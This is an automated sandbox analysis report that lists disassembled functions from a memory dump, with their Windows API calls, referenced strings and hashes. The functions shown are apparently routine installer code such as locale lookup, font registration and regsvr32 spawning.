Function 004BDFE8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004BE025
GetActiveWindow.USER32 ref: 004BE08F
CoInitialize.OLE32(00000000), ref: 004BE0A3
SHBrowseForFolderW.SHELL32(?), ref: 004BE0BA
CoUninitialize.OLE32(004BE100,?,?,?,?,?,?,00000000,004BE18C), ref: 004BE0CF
SetActiveWindow.USER32(?,004BE100,?,?,?,?,?,?,00000000,004BE18C), ref: 004BE0EA
SetActiveWindow.USER32(?,?,004BE100,?,?,?,?,?,?,00000000,004BE18C), ref: 004BE0F3

Strings

A, xrefs: 004BE063

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
String ID: A
API String ID: 2684663990-3554254475
Opcode ID: 4ade4f6a8613c24f2e3e6f3b19276fa2e1b7f7c7591f8a0ae4a28917c198b08c
Instruction ID: 27897c91037dd08ac6dbe90fd417e1d5b8753a3b602226e44ecd976f2099516a
Opcode Fuzzy Hash: 4ade4f6a8613c24f2e3e6f3b19276fa2e1b7f7c7591f8a0ae4a28917c198b08c
Instruction Fuzzy Hash: E1312071D04208AFDB11EFA6C4856DEBBF8EB48304F5184BAF504E7252D7789A44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004802FC, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 00480323

Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?), ref: 00409644

RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6,?,00000000), ref: 00480376

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00480385
GetUserDefaultUILanguage, xrefs: 00480319
.DEFAULT\Control Panel\International, xrefs: 0048034D
kernel32.dll, xrefs: 0048031E
Locale, xrefs: 00480365

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 9f2c706ac71d1aa86704251723dacbe3758a65464a82b0e10450b27e20b96fc3
Instruction ID: 04bd3f871a73b1d1c362cdd5e7ddb51ae15ac1bd370bfaf3e4d8d8d317905ba8
Opcode Fuzzy Hash: 9f2c706ac71d1aa86704251723dacbe3758a65464a82b0e10450b27e20b96fc3
Instruction Fuzzy Hash: CE214630A50209AFDB50FBE5CD51B9EB7E9EB44704F514877AA00E7281E77CAE09CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF4, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 0040502D
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5,?,?,?,00000002,004051BA,00403127,0040316E,?), ref: 00405033
GetStdHandle.KERNEL32(000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 00405048
WriteFile.KERNEL32(00000000,000000F5,00405080,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004050A5), ref: 0040504E
MessageBoxA.USER32 ref: 0040506C

Strings

,cP, xrefs: 00405012
Runtime error at 00000000, xrefs: 00405026, 00405065
Error, xrefs: 00405060

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$Message
String ID: ,cP$Error$Runtime error at 00000000
API String ID: 1570097196-4047953566
Opcode ID: 6c7604eda5c4a0ce1aa4cc839e6402abadb8f35502979381c1b1512bad27fe2a
Instruction ID: aff957db733e422e874226c42b257deaddd16d96984e274b0132c5c61b15b77c
Opcode Fuzzy Hash: 6c7604eda5c4a0ce1aa4cc839e6402abadb8f35502979381c1b1512bad27fe2a
Instruction Fuzzy Hash: 47F0246165434078EA20B3644C5AFDF2A589340F24F10067FF610F60E3C3BC44D8AAAA

Uniqueness

Uniqueness Score: -1.00%

Function 0046163C, Relevance: 13.7, APIs: 9, Instructions: 192COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 004616A8

Part of subcall function 00460EBC: BeginPaint.USER32(00000000,?), ref: 00460EE7
Part of subcall function 00460EBC: EndPaint.USER32(00000000,?,00461022), ref: 00461015

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Begin
String ID:
API String ID: 3787552996-0
Opcode ID: 7c409f4ab0597410b05749fba46433bfd8b4f4b8770711e8726df9f751545dc2
Instruction ID: d46ae31251de83a97f6ba12247c19facf33136aff6cd86709a6d8903bde49e13
Opcode Fuzzy Hash: 7c409f4ab0597410b05749fba46433bfd8b4f4b8770711e8726df9f751545dc2
Instruction Fuzzy Hash: E6614575A00148AFDB04EFE9C951EAEBBF9EB49304F14406AF504E7361D738AE01CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004458BC, Relevance: 13.7, APIs: 9, Instructions: 170COMMON

Download Yara Rule

APIs

Part of subcall function 00431848: InitializeCriticalSection.KERNEL32(00433F14,00433ED8,00000000,00000001,0043406E,00000000,?,00000000,00435659), ref: 00431868

Part of subcall function 00431F18: FrameRect.USER32 ref: 00431F41

InflateRect.USER32(?,000000FF,000000FF), ref: 0044592D
InflateRect.USER32(?,000000FF,000000FF), ref: 0044599D
GetWindowLongW.USER32(00000000,000000F0), ref: 004459C2
GetSystemMetrics.USER32 ref: 004459F7
GetSystemMetrics.USER32 ref: 00445A15
DrawEdge.USER32(00000000,?,00000000,00000008), ref: 00445A7A
GetSystemMetrics.USER32 ref: 00445A81
DrawFrameControl.USER32 ref: 00445AB6
DrawFrameControl.USER32 ref: 00445AD1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawFrameMetricsRectSystem$ControlInflate$CriticalEdgeInitializeLongSectionWindow
String ID:
API String ID: 1915978996-0
Opcode ID: 03f134dd0134301db97ce73585b55a69737ace2bf493c903886dc178de53db3e
Instruction ID: e5c7667d68e5aa7310727093ebd7b4fe04d5cf93aebfcfcf51c9aee4529f5956
Opcode Fuzzy Hash: 03f134dd0134301db97ce73585b55a69737ace2bf493c903886dc178de53db3e
Instruction Fuzzy Hash: 7F618170A04245AFEF01EF69C985BDE77F4AF06314F280176A940BB297D7789E04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0045ACF8, Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 0045AD33
MulDiv.KERNEL32(?,?,?), ref: 0045AD4D
MulDiv.KERNEL32(?,?,?), ref: 0045AD7B
MulDiv.KERNEL32(?,?,?), ref: 0045AD91
MulDiv.KERNEL32(?,?,?), ref: 0045ADBF
MulDiv.KERNEL32(?,?,?), ref: 0045ADD7

Part of subcall function 004310BC: MulDiv.KERNEL32(00000000,00000048,?), ref: 004310CD

MulDiv.KERNEL32(?), ref: 0045AE3A
MulDiv.KERNEL32(?), ref: 0045AE64
MulDiv.KERNEL32(00000000), ref: 0045AE8A

Part of subcall function 004310D8: MulDiv.KERNEL32(00000000,?,00000048), ref: 004310E5

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb277bad611c346ff1991370ca033b106477e3967459932ce9857668bd030e1
Instruction ID: cbcf29d1df717e5467e7b58d9b1f3f7bb140d44b15be0f5f3a5574123752bf6b
Opcode Fuzzy Hash: cdb277bad611c346ff1991370ca033b106477e3967459932ce9857668bd030e1
Instruction Fuzzy Hash: A7513D716043509FC320EB69C845A6AFBFA9F49342F04491EB9D6C7763C678EC588B16

Uniqueness

Uniqueness Score: -1.00%

Function 004B3054, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004B3204,00000000, /s ",?,regsvr32.exe",?,004B3204), ref: 004B3172

Strings

/s ", xrefs: 004B30CB
Spawning 64-bit RegSvr32: , xrefs: 004B30ED
D, xrefs: 004B3128
/u, xrefs: 004B30BE
regsvr32.exe", xrefs: 004B30A3
CreateProcess, xrefs: 004B3164
0x%x, xrefs: 004B3195
Spawning 32-bit RegSvr32: , xrefs: 004B3107

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: e7e983a44f64b51583ae793be7eef80fe124c67378b3e55e78d5736695bcecb3
Instruction ID: 66d8bbeefab001e93fd0daa37c0fcf61f05cf9f06ca673b2bfef83fab24dbd4d
Opcode Fuzzy Hash: e7e983a44f64b51583ae793be7eef80fe124c67378b3e55e78d5736695bcecb3
Instruction Fuzzy Hash: C0415570A00308ABDB14EFE6C882BCDB7B9AF48704F61417FA515B7681D7789A05CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00412F90, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 203threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0041326E,?,?,00000000,00000000), ref: 00412FC6

Part of subcall function 00410FC0: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00410FDE

Strings

AMPM, xrefs: 004131EA
mmmm d, yyyy, xrefs: 004130CB
:mm, xrefs: 00413209
:mm:ss, xrefs: 00413226
AMPM , xrefs: 004131F9
m/d/yy, xrefs: 0041309E

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 509fd217e86747cf4497de6bfe02dd89315d88281094d8e9674e5b4908f219ef
Instruction ID: 7c054af7a516aab345ac8521e9f423a8792475cef51cfb87fefa8a466171e700
Opcode Fuzzy Hash: 509fd217e86747cf4497de6bfe02dd89315d88281094d8e9674e5b4908f219ef
Instruction Fuzzy Hash: 0F7187307001089BD700FBA5D842ADE76B5EB88308F50847BB501AB786CE7DDE86975D

Uniqueness

Uniqueness Score: -1.00%

Function 004169E4, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00416A7D
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00416A99
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00416AD2
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00416B4F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00416B68
VariantCopy.OLEAUT32(?), ref: 00416B9D

Strings

, xrefs: 004169FE

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: cb83866fc7136a6878018b286a1c02c2e34de7550b6684809434eb0022da1d5c
Instruction ID: 073c607dc89d15d92b45d7eff1d1d7c35c10424ae1d92f49a1c29152ec58865f
Opcode Fuzzy Hash: cb83866fc7136a6878018b286a1c02c2e34de7550b6684809434eb0022da1d5c
Instruction Fuzzy Hash: AE511CB590162D9BCB22DB59C881AD9B7FDAF49304F4141DAF508E7206D638EFC48F68

Uniqueness

Uniqueness Score: -1.00%

Function 0042A364, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0042A36F
GetCurrentThreadId.KERNEL32 ref: 0042A37E

Part of subcall function 0042A318: ResetEvent.KERNEL32(00000210,0042A3B9), ref: 0042A31E

EnterCriticalSection.KERNEL32(0050AE80), ref: 0042A3C3
InterlockedExchange.KERNEL32(00502EC8,?), ref: 0042A3DF
LeaveCriticalSection.KERNEL32(0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A438
EnterCriticalSection.KERNEL32(0050AE80,0042A4D0,0050AE80,00000000,0042A527,?,00502EC8,?,00000000,0042A546,?,0050AE80), ref: 0042A4C3

Strings

<`P, xrefs: 0042A374

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID: <`P
API String ID: 2189153385-3701931957
Opcode ID: bd7b8ebf7e62c471217bab9fd84c79d5e2d97499c809078ca5d24df3921ba1f5
Instruction ID: 42fa02cbf40a98ce2fd9b3a1e65ae42f65c158ee23ab3f7ba28234894369a059
Opcode Fuzzy Hash: bd7b8ebf7e62c471217bab9fd84c79d5e2d97499c809078ca5d24df3921ba1f5
Instruction Fuzzy Hash: 1B41CF30704310AFD711EF65E845A6EB7F8EB49304FA184A6EC0097692C77C9D55DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 004CEC18, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 96registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C

RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,?,?,00000002,00000000,00000000,004CED2B), ref: 004CEC8F
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,?,?,00000002,00000000,00000000,004CED2B), ref: 004CECA6
AddFontResourceW.GDI32(00000000), ref: 004CECC3
SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004CECD7

Strings

Failed to open Fonts registry key., xrefs: 004CECAD
Failed to set value in Fonts registry key., xrefs: 004CEC98
AddFontResource, xrefs: 004CECE1

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFontMessageNotifyOpenResourceSendValue
String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
API String ID: 955540645-649663873
Opcode ID: 9e41663603656e58dceacd3ed144d66a10a6a1879d6e1b9ea8112c51ca560b96
Instruction ID: 1ae1af7493465433afe2178bc3922193daddb8bdb9712a5147cc0489bf80432c
Opcode Fuzzy Hash: 9e41663603656e58dceacd3ed144d66a10a6a1879d6e1b9ea8112c51ca560b96
Instruction Fuzzy Hash: DF31D678A002056BD750EBA6CC42FAE73A8AB45704F11453EF901E7782D7789D019768

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD24, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 0042DD55
SystemParametersInfoW.USER32 ref: 0042DD7C
GetSystemMetrics.USER32 ref: 0042DD91
GetSystemMetrics.USER32 ref: 0042DD9C
lstrcpyW.KERNEL32 ref: 0042DDC6

Part of subcall function 0042D96C: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042DA08

Strings

GetMonitorInfoW, xrefs: 0042DD3C
DISPLAY, xrefs: 0042DDBD

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 1539801207-2774842281
Opcode ID: 6013b80fee8828815b7bf70af07bb6106d25a2d168ece8b6bcdae926e03c5d5a
Instruction ID: f8a99659de7e936d26b859332dc36a9af10afe7b9189107396f3b145f37c3306
Opcode Fuzzy Hash: 6013b80fee8828815b7bf70af07bb6106d25a2d168ece8b6bcdae926e03c5d5a
Instruction Fuzzy Hash: C211D331B20B249FE720DF61EC447ABB7A9FF15710F40452EE85597290D3B5A808CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401E90, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,00000000,00401B02), ref: 00401F26
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00401B02), ref: 00401F40

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 640c5057a72c6dbb0422c9b9f9754700285ad1cf43a38a5375ac3ac175463c7f
Instruction ID: 2c2d5c02e637940cdaae66071fd82b231375502963bbe3d5c6e07b4922b04b4c
Opcode Fuzzy Hash: 640c5057a72c6dbb0422c9b9f9754700285ad1cf43a38a5375ac3ac175463c7f
Instruction Fuzzy Hash: 877111716042008FD725DB29CD84B2ABBD4AB95314F18C2BFE844AB3F2C778C845CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046C2BC, Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0046C31B
